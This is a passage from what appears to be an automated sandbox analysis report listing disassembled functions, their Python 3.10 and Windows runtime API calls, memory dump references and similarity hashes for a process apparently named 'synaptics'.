                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unicode_$CharFindReady$Err_MemorySubstring
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1651886216-0
                                                                                                                                                                                                      • Opcode ID: 6944e8423c17ea05e34598456d949e9cfcec9d2a973dc6ca3abb81f27c6b7717
                                                                                                                                                                                                      • Instruction ID: c0f83eb6a109856eca43959b77bab1d36691dcec630ba0fc2882cee9600a0443
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6944e8423c17ea05e34598456d949e9cfcec9d2a973dc6ca3abb81f27c6b7717
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44412571E042185BDF10CE5CCC41FAA77A2FF8931AF56466AECA49BB81D331D902C792
                                                                                                                                                                                                      Function 6C4A9EE0 Relevance: 7.6, APIs: 5, Instructions: 125COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyDict_SetItem_KnownHash.PYTHON310(?,?,?,6C4AA056,?,?,?,6C4AA056,?,00000000), ref: 6C4A9EFC
                                                                                                                                                                                                        • Part of subcall function 6C473C40: _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,00000661), ref: 6C473C6D
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BF18,?), ref: 6C4A9F38
                                                                                                                                                                                                      • PyErr_NoMemory.PYTHON310(?,?,?,?,?,?,?,6C4AA056,?,00000000), ref: 6C4A9FAC
                                                                                                                                                                                                      • _PyDict_DelItem_KnownHash.PYTHON310 ref: 6C4A9FDD
                                                                                                                                                                                                      • _PyErr_ChainExceptions.PYTHON310(00000000,?,?), ref: 6C4A9FE5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Dict_HashItem_Known$ChainExceptionsFormatMemoryObject
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 990801813-0
                                                                                                                                                                                                      • Opcode ID: 09333e9a6a1ed742873253ccb9be8052b0ba8c1acf10862a28251c50e4cf60fe
                                                                                                                                                                                                      • Instruction ID: 341907e92c2fea57ff45e980882a2563ace7af6ef4bc42cd63bc75fac7f46704
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09333e9a6a1ed742873253ccb9be8052b0ba8c1acf10862a28251c50e4cf60fe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC419675A042049FD700DF9AD880F9ABBF4EF59329F5442A9E9088BB51D332ED06CF91
                                                                                                                                                                                                      Function 6C58EDB0 Relevance: 7.6, APIs: 5, Instructions: 115threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C58EE3B
                                                                                                                                                                                                      • PyThread_acquire_lock_timed.PYTHON310(00000000,000000FF,000000FF,00000000), ref: 6C58EF0F
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6C58EF5A
                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C58EF79
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 6C58EF80
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$CurrentEnterLeaveReleaseSemaphoreThreadThread_acquire_lock_timed
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2652661456-0
                                                                                                                                                                                                      • Opcode ID: 144f5375124f6e1429974a7132d82ac9fe57a3fb3b0f3afcca590ff9613e8ddc
                                                                                                                                                                                                      • Instruction ID: 6c17ac02c19e45ba5682e8d51fd571d96b713ce50f5ef0872fcb7824bbe38022
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 144f5375124f6e1429974a7132d82ac9fe57a3fb3b0f3afcca590ff9613e8ddc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7551AEB0605B119FE7208F29C858743BBF0FB44718F108A1DD5AA8AB90D7BAB458CF90
                                                                                                                                                                                                      Function 73A82CB0 Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 73A82CBE
                                                                                                                                                                                                      • _local_unwind2.VCRUNTIME140(?,000000FF), ref: 73A82DB5
                                                                                                                                                                                                        • Part of subcall function 73A84170: _ValidateScopeTableHandlers.LIBCMT ref: 73A84284
                                                                                                                                                                                                        • Part of subcall function 73A84170: __FindPESection.LIBCMT ref: 73A842A1
                                                                                                                                                                                                      • _CallDestructExceptionObject.LIBVCRUNTIME ref: 73A82D40
                                                                                                                                                                                                      • _global_unwind2.VCRUNTIME140(?), ref: 73A82D4C
                                                                                                                                                                                                      • _local_unwind2.VCRUNTIME140(?,?), ref: 73A82D59
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _local_unwind2$CallDestructExceptionFindHandlersObjectScopeSectionTableValidate___except_validate_context_record_global_unwind2
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2319145605-0
                                                                                                                                                                                                      • Opcode ID: f3d13c3a5ea1f142452a4eeb759da4179e1c0808f1449dba37e1db50ea43c55b
                                                                                                                                                                                                      • Instruction ID: a0c8aadab1c71b10980fbcb54f87a3acc6f38eee36e3764f536ee07ff2c887de
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3d13c3a5ea1f142452a4eeb759da4179e1c0808f1449dba37e1db50ea43c55b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8231EA729002089BDB01DF58DC81BFABBA5FF44314F058566EC1A8B289E731F52487E0
                                                                                                                                                                                                      Function 6C4A0D50 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyDict_Next.PYTHON310(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4A0D44,?), ref: 6C4A0D8B
                                                                                                                                                                                                      • _PyDict_Next.PYTHON310(?,?,?,?), ref: 6C4A0F41
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Dict_Next
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3206864030-0
                                                                                                                                                                                                      • Opcode ID: d72c52d77819cba9427710657309e386fca7ca40a30697eae68d1af429c85608
                                                                                                                                                                                                      • Instruction ID: a1e104034e69ff8f0511c487356c41c0980add7028b24cd07876b9764c1447f5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d72c52d77819cba9427710657309e386fca7ca40a30697eae68d1af429c85608
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE21F2B26043459BD320CA96CD80FDB73FCABA8649F000529F946D7B52E730E5098BA2
                                                                                                                                                                                                      Function 6C4A5D60 Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?), ref: 6C4A5DBE
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74C50C), ref: 6C4A5DD2
                                                                                                                                                                                                      • _PyDict_GetItem_KnownHash.PYTHON310(00000000,00000000,?), ref: 6C4A5DE3
                                                                                                                                                                                                      • PyList_SetSlice.PYTHON310(00000000,?,?,00000000), ref: 6C4A5E26
                                                                                                                                                                                                      • _PyErr_Restore.PYTHON310(?,?,?,?), ref: 6C4A5E39
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ClearDict_FromHashItem_KnownList_RestoreSliceUnicode_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3318978466-0
                                                                                                                                                                                                      • Opcode ID: 5b9605700797cc6d38af357ca58fd09d72bd8eb7d47472a230a79c4d13e80ef3
                                                                                                                                                                                                      • Instruction ID: 4032f3a6d8ec8faa5ede5718d3e139240eef18bfbf9ff81bc9a011d6f41602af
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b9605700797cc6d38af357ca58fd09d72bd8eb7d47472a230a79c4d13e80ef3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD213275A026189FDB10DF95DA40FABB7B8EB51319F054058E8044FF1AD731E806CBE1
                                                                                                                                                                                                      Function 6C58EB60 Relevance: 7.5, APIs: 5, Instructions: 46threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyInterpreterState_IDInitref.PYTHON310(6C48BCD6,00000000,?,?,6C48BCD6,00000000), ref: 6C58EB6C
                                                                                                                                                                                                        • Part of subcall function 6C58EAE0: PyThread_allocate_lock.PYTHON310(?,6C48BCD6,?), ref: 6C58EAF3
                                                                                                                                                                                                        • Part of subcall function 6C58EAE0: _PyErr_SetObject.PYTHON310(?,6C73E920,00000000,00000000,00000000,00000000,?,6C48BCD6,?), ref: 6C58EB20
                                                                                                                                                                                                      • PyThread_acquire_lock_timed.PYTHON310(E58B5B5E,000000FF,000000FF,00000000,00000000), ref: 6C58EB89
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(E58B5B5E), ref: 6C58EBA1
                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C58EBC0
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(E58B5B5E), ref: 6C58EBC7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterErr_InitrefInterpreterLeaveObjectReleaseSemaphoreState_Thread_acquire_lock_timedThread_allocate_lock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3771952171-0
                                                                                                                                                                                                      • Opcode ID: 71037323a1b099688ff3a506fb28da442a63fae6cf9d6d733d2d5da7122a9b98
                                                                                                                                                                                                      • Instruction ID: 23b06970e9c7cf1394216db746e836939490c642d3efb2ed13abe9d1d30d7a86
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71037323a1b099688ff3a506fb28da442a63fae6cf9d6d733d2d5da7122a9b98
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0701D431A05A205BDB305E288C05B4677F8EF06734F100749F866A2AD0E7A1F6044BC4
                                                                                                                                                                                                      Function 6C499DE0 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyStructSequence_New.PYTHON310(6C751A50), ref: 6C499DE6
                                                                                                                                                                                                        • Part of subcall function 6C4B2050: _PyObject_GC_NewVar.PYTHON310(6C751978,00000000,?,?,?,?,6C480854,6C751978), ref: 6C4B207F
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(0000000F), ref: 6C499DF6
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(00000002,0000000F), ref: 6C499E00
                                                                                                                                                                                                        • Part of subcall function 6C491A40: _PyLong_New.PYTHON310(00000001,00000000,?,?,?,6C480883,00000400), ref: 6C491A96
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(000010CC,00000002,0000000F), ref: 6C499E0D
                                                                                                                                                                                                        • Part of subcall function 6C491A40: _PyLong_New.PYTHON310(00000002,00000000,?,?,?,6C480883,00000400), ref: 6C491ABC
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(00000280,000010CC,00000002,0000000F), ref: 6C499E1A
                                                                                                                                                                                                        • Part of subcall function 6C491A40: _PyLong_New.PYTHON310(00000000,00000000,?,?,?,6C480883,00000400), ref: 6C491AF9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Long_$FromLong$Object_Sequence_Struct
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1079201275-0
                                                                                                                                                                                                      • Opcode ID: 2750e243af1a32f0e84092061ce26df40a63590f9e29f093afa7788a9bbd7476
                                                                                                                                                                                                      • Instruction ID: 87eb09c49f4e9d1463de3631d81e10269f7ba6e9f066ccc2699bd053ad26f92a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2750e243af1a32f0e84092061ce26df40a63590f9e29f093afa7788a9bbd7476
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFF0F6319013204BDB60DFB49905FC67BE0AF00764F000A2CD56A8BFC0D775E88487C1
                                                                                                                                                                                                      Function 6C47F860 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 6C47F866
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C47F86D
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C47F87F
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C47F886
                                                                                                                                                                                                      • _PyObject_New.PYTHON310(?), ref: 6C47F89D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __acrt_iob_func_fileno$Object_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1158252887-0
                                                                                                                                                                                                      • Opcode ID: 62e3a32fe8f3d423d07a0922a901c3ffea9e7d068d7ba79b38f516e6e727b3c8
                                                                                                                                                                                                      • Instruction ID: 2e94005cd9244843ae2361da7581cb63c02b341bda2a856d1086aa1e6e8c327e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62e3a32fe8f3d423d07a0922a901c3ffea9e7d068d7ba79b38f516e6e727b3c8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29E0E572A0132117EE20B7E86C4DEE5B62CDB0129BF034065FA0DC2A42EB21E25082F6
                                                                                                                                                                                                      Function 6C4A5C30 Relevance: 7.5, APIs: 5, Instructions: 18COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyDict_DebugMallocStats.PYTHON310(?), ref: 6C4A5C38
                                                                                                                                                                                                        • Part of subcall function 6C471F50: PyOS_snprintf.PYTHON310(?,00000080,%d %ss * %zd bytes each,?,free PyDictObject,00000020), ref: 6C471F8F
                                                                                                                                                                                                        • Part of subcall function 6C471F50: PyOS_snprintf.PYTHON310(?,00000080,%48s ,?,?,00000080,%d %ss * %zd bytes each,?,free PyDictObject,00000020), ref: 6C471FAC
                                                                                                                                                                                                      • _PyFloat_DebugMallocStats.PYTHON310(?,?), ref: 6C4A5C3E
                                                                                                                                                                                                        • Part of subcall function 6C483460: PyOS_snprintf.PYTHON310(?,00000080,%d %ss * %zd bytes each,?,free PyFloatObject,00000010), ref: 6C48349F
                                                                                                                                                                                                        • Part of subcall function 6C483460: PyOS_snprintf.PYTHON310(?,00000080,%48s ,?,?,00000080,%d %ss * %zd bytes each,?,free PyFloatObject,00000010), ref: 6C4834BC
                                                                                                                                                                                                      • _PyFrame_DebugMallocStats.PYTHON310(?,?,?), ref: 6C4A5C44
                                                                                                                                                                                                        • Part of subcall function 6C485AD0: PyOS_snprintf.PYTHON310(?,00000080,%d %ss * %zd bytes each,?,free PyFrameObject,00000138), ref: 6C485B12
                                                                                                                                                                                                        • Part of subcall function 6C485AD0: PyOS_snprintf.PYTHON310(?,00000080,%48s ,?,?,00000080,%d %ss * %zd bytes each,?,free PyFrameObject,00000138), ref: 6C485B2F
                                                                                                                                                                                                      • _PyList_DebugMallocStats.PYTHON310(?,?,?,?), ref: 6C4A5C4A
                                                                                                                                                                                                        • Part of subcall function 6C48D160: PyOS_snprintf.PYTHON310(?,00000080,%d %ss * %zd bytes each,?,free PyListObject,00000014), ref: 6C48D19F
